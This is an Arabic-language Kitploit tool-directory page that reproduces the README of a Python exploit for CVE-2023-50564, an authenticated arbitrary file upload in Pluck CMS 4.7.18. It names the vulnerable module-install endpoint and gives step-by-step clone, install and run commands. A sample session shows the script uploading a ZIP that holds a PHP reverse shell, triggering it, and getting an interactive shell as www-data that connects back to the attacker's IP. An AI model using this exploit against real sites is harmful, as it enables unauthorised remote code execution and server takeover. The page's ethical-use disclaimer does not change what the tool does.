Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-50564 — يستغل هذا السكربت ميزة رفع الملفات في نظام Pluck CMS الإصدار 4.7.18 لرفع ملف PHP خبيث، مما يتيح الوصول عن بُعد عبر قشرة عكسية (reverse shell). وبمجرد رفعه، يمنح هذا الباب الخلفي المهاجم وصولًا إلى الخادم بصلاحيات خادم الويب، مما يسمح بتنفيذ إجراءات إضافية داخل النظام أو الشبكة. | Kitploit
أدوات/GitHubGitHub/mrterrestrial/cve-2023-50564
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubmrterrestrial/cve-2023-50564

CVE-2023-50564

يستغل هذا السكربت ميزة رفع الملفات في نظام Pluck CMS الإصدار 4.7.18 لرفع ملف PHP خبيث، مما يتيح الوصول عن بُعد عبر قشرة عكسية (reverse shell). وبمجرد رفعه، يمنح هذا الباب الخلفي المهاجم وصولًا إلى الخادم بصلاحيات خادم الويب، مما يسمح بتنفيذ إجراءات إضافية داخل النظام أو الشبكة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

CVE-2023-50564 - استغلال Pluck CMS v4.7.18

نظرة عامة

يستغل هذا السكربت ثغرة رفع ملفات تعسفية موثّقة في Pluck CMS v4.7.18 (CVE-2023-50564). من خلال استغلال هذه الثغرة، يمكن لمهاجم موثّق رفع ملف PHP خبيث، مما يتيح تنفيذ أكواد تعسفية (في هذه الحالة، شيل عكسي).

تفاصيل الاستغلال

  • CVE ID: CVE-2023-50564
  • الإصدار المتأثر: Pluck CMS v4.7.18
  • النوع: رفع ملفات تعسفية موثّق
  • التأثير: تنفيذ أكواد عن بُعد (RCE)

توجد الثغرة في نقطة النهاية /admin.php?action=installmodule، والتي تسمح لمستخدم موثّق برفع ملف ZIP يحتوي على ملفات تعسفية. من خلال رفع ملف PHP خبيث، ينشئ هذا الاستغلال شيلًا عكسيًا يعود إلى المهاجم.

المتطلبات

  • Python 3.x
  • وحدة requests: pip install requests
  • وحدة requests-toolbelt: pip install requests-toolbelt

يتطلب هذا السكربت أيضًا تسجيل دخول صالحًا لمثيل Pluck CMS، بما في ذلك عنوان URL الخاص بالهدف وكلمة المرور.

ميزات الاستغلال

  • شيل عكسي: يرفع الاستغلال شيل PHP عكسيًا إلى الهدف ويتصل مرة أخرى بجهاز المهاجم.
  • تنفيذ أوامر تفاعلي: بمجرد إنشاء الشيل العكسي، يمكن تنفيذ الأوامر بشكل تفاعلي على الهدف.
  • كشف مطالبات كلمة المرور: يكتشف الاستغلال مطالبات كلمة المرور (مثل su, sudo -l) ويسمح للمستخدم بإدخال البيانات يدويًا.

الاستخدام

خطوات تشغيل الاستغلال

  1. استنساخ المستودع:
    root@kitploit:~
    git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
    cd Pluck-CMS-Exploit
    
  2. تثبيت حزم Python المطلوبة: تأكد من تثبيت الحزم المطلوبة:
    root@kitploit:~
    pip install requests requests-toolbelt
    
  3. تشغيل الاستغلال: يتطلب السكربت أربعة مدخلات: عنوان URL للهدف، وكلمة مرور CMS، وعنوان IP خاص بك (للشيل العكسي)، والمنفذ الذي تريد الاستماع عليه.

قم بتشغيل الاستغلال باستخدام Python:

root@kitploit:~
 python3 exploit.py
  1. أدخل المدخلات عند الطلب:
  • أدخل عنوان URL للهدف (مثل example.com).
  • أدخل كلمة المرور للمصادقة على CMS.
  • أدخل عنوان IP الخاص بك لاتصال الشيل العكسي.
  • أدخل المنفذ للاستماع إلى الشيل العكسي.
  1. شيل تفاعلي: بمجرد إنشاء الشيل العكسي، ستظهر لك موجه Shell> للتفاعل مع النظام الهدف.

مثال:

root@kitploit:~
 $ python3 exploit.py
 Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
 Enter the password for target authentication: password123
 Enter your IP (for reverse shell): 10.10.14.5
 Enter the port to listen on (for reverse shell): 4444
 [*] Authenticating to the target...
 [+] Authentication successful.
 [*] Generating reverse shell PHP file...
 [+] Reverse shell PHP file created successfully as 'shell.php'.
 [*] Creating ZIP payload...
 [+] ZIP file created as 'payload.zip'.
 [*] Starting reverse shell listener on 10.10.14.5:4444 ...
 [*] Uploading payload to the target...
 [+] Payload uploaded successfully.
 [*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
 [+] Connection received from ('10.10.10.1', 55678)
 Shell> whoami
 www-data

تحليل الاستغلال

  • المصادقة: يسجل السكربت الدخول إلى CMS باستخدام بيانات الاعتماد المقدمة.
  • رفع الملفات: يقوم بإنشاء أرشيف ZIP يحتوي على شيل PHP عكسي ويرفعه إلى نقطة النهاية الضعيفة (/admin.php?action=installmodule).
  • الشيل العكسي: يقوم السكربت بتشغيل ملف PHP المرفوع، مما ينشئ اتصال شيل عكسيًا يعود إلى جهاز المهاجم.

تفاصيل CVE

  • CVE ID: CVE-2023-50564
  • نقطة النهاية الضعيفة: /admin.php?action=installmodule
  • الإصدار الضعيف: Pluck CMS v4.7.18
  • النوع: رفع ملفات تعسفية موثّق

إخلاء المسؤولية

هذا السكربت مخصص للأغراض التعليمية والاختراق الأخلاقي. يجب استخدامه فقط في البيئات التي لديك فيها إذن صريح للاختبار. المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة.

الترخيص

هذا المشروع مرخّص بموجب رخصة MIT - راجع MIT License للتفاصيل.

المساهمة

لا تتردد في عمل fork للمستودع وتقديم pull requests. لأي مشكلات أو طلبات ميزات، يرجى فتح issue على GitHub.

تنزيل الأداة